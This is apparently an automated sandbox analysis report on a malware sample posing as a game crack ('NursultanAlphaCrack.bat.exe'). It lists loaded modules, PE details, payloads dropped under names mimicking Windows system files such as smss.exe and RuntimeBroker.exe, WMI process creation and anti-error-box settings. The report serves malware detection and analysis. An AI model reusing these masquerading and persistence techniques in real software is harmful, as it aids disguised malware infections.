                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: vcruntime140_clr0400.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: ucrtbase_clr0400.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: uxtheme.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: windows.storage.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: wldp.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: profapi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: cryptsp.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: rsaenh.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: cryptbase.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: sspicli.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: ktmw32.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: wbemcomn.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: amsi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: userenv.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: iphlpapi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: dnsapi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: dhcpcsvc6.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: dhcpcsvc.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: winnsi.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: rasapi32.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: rasman.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: rtutils.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: mswsock.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: winhttp.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: ondemandconnroutehelper.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: rasadhlp.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: fwpuclnt.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: propsys.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: apphelp.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: dlnashext.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: wpdshext.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: edputil.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: urlmon.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: iertutil.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: srvcli.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: netutils.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: windows.staterepositoryps.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: wintypes.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: appresolver.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: bcp47langs.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: slc.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: sppc.dll
                                    Source: C:\Program Files\Windows NT\smss.exeSection loaded: onecorecommonproxystub.dll
                                    Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: ulib.dll
                                    Source: C:\Windows\System32\chcp.comSection loaded: fsutilext.dll
                                    Source: C:\Windows\System32\w32tm.exeSection loaded: iphlpapi.dll
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
                                    Source: Window RecorderWindow detected: More than 3 window changes detected
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows Sidebar\Gadgets\9e8d7a4ca61bd9Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\WindowsPowerShell\0a62118e203df5Jump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows NT\smss.exeJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeDirectory created: C:\Program Files\Windows NT\69ddcba757bf72Jump to behavior
                                    Source: NursultanAlphaCrack.bat.exeStatic file information: File size 2866940 > 1048576
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                                    Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: NursultanAlphaCrack.bat.exe
                                    Source: Binary string: 5c561934e089\System.pdb source: smss.exe, 00000032.00000002.2216710248.000000001BED2000.00000004.00000020.00020000.00000000.sdmp
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeFile created: C:\portsurrogateFontCrt\__tmp_rar_sfx_access_check_4596984Jump to behavior
                                    Source: NursultanAlphaCrack.bat.exeStatic PE information: section name: .didat
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DF640 push ecx; ret 0_2_001DF653
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeCode function: 0_2_001DEB78 push eax; ret 0_2_001DEB96
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF887D74B69 push ecx; retf 5_2_00007FF887D74B72
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF887D74342 push edx; ret 5_2_00007FF887D74343
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF887D701CD pushad ; iretd 5_2_00007FF887D70286
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF887ED2EC9 push edi; iretd 5_2_00007FF887ED2ECB
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF887ED1C66 push edi; iretd 5_2_00007FF887ED1C68
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeCode function: 5_2_00007FF888154557 push eax; retf 5_2_00007FF888154791
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D86878 push edx; iretd 50_2_00007FF887D8687B
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D8942C push edx; ret 50_2_00007FF887D8942D
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D95BF5 pushad ; retf 50_2_00007FF887D95BFD
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D98123 push ebx; ret 50_2_00007FF887D9816A
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887DA7948 push ebx; retf 50_2_00007FF887DA796A
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D74B69 push ecx; retf 50_2_00007FF887D74B72
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D74342 push edx; ret 50_2_00007FF887D74343
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887D701CD pushad ; iretd 50_2_00007FF887D70286
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887ED2EC9 push edi; iretd 50_2_00007FF887ED2ECB
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF887ED1C66 push edi; iretd 50_2_00007FF887ED1C68
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 50_2_00007FF888154557 push eax; retf 50_2_00007FF888154791
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 55_2_00007FF887D54B69 push ecx; retf 55_2_00007FF887D54B72
                                    Source: C:\Program Files\Windows NT\smss.exeCode function: 55_2_00007FF887D54342 push edx; ret 55_2_00007FF887D54343

                                    Persistence and Installation Behavior

                                    barindex
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files\Windows NT\smss.exeJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\BwtLSSWj.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files\Windows NT\smss.exeJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\wSzMZIas.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\USBzXUek.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\DYilKdVO.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\gDHycgoN.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\Rfxshdov.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\OfbStevG.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files (x86)\AutoIt3\Include\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\rEjFTmFn.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\JRLLnIaC.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\medFrqzz.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\VlKreyqd.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\qmbOMItv.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\EErUokRe.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files\WindowsPowerShell\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\ssnNFABl.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\sXGeTWEn.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\ZFTyARuY.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\BOAdhoQl.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\oCwXyDAs.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\uQMeEZWw.logJump to dropped file
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeFile created: C:\portsurrogateFontCrt\BlockcontainerWin.exeJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\lhCxVqkE.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Program Files\Windows Sidebar\Gadgets\RuntimeBroker.exeJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\BAOTDPUV.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\kHvGrYKy.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\ZTFIdpqp.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\npqXqOLK.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\JDNtgNEK.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\blWilNVX.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\rfhNxLLD.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\ZFTyARuY.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\JDNtgNEK.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\qmbOMItv.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\gDHycgoN.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\lhCxVqkE.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\medFrqzz.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\USBzXUek.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\BAOTDPUV.logJump to dropped file
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeFile created: C:\Users\user\Desktop\sXGeTWEn.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\Rfxshdov.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\ssnNFABl.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\blWilNVX.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\oCwXyDAs.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\VlKreyqd.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\DYilKdVO.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\kHvGrYKy.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\JRLLnIaC.logJump to dropped file
                                    Source: C:\Recovery\GKcQVcpwHdHgqKNzncXgLOYQsT.exeFile created: C:\Users\user\Desktop\rEjFTmFn.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\BwtLSSWj.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\EErUokRe.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\uQMeEZWw.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\BOAdhoQl.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\rfhNxLLD.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\ZTFIdpqp.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\OfbStevG.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\wSzMZIas.logJump to dropped file
                                    Source: C:\Program Files\Windows NT\smss.exeFile created: C:\Users\user\Desktop\npqXqOLK.logJump to dropped file

                                    Hooking and other Techniques for Hiding and Protection

                                    barindex
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
                                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
                                    Source: C:\Users\user\Desktop\NursultanAlphaCrack.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                                    Source: C:\portsurrogateFontCrt\BlockcontainerWin.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
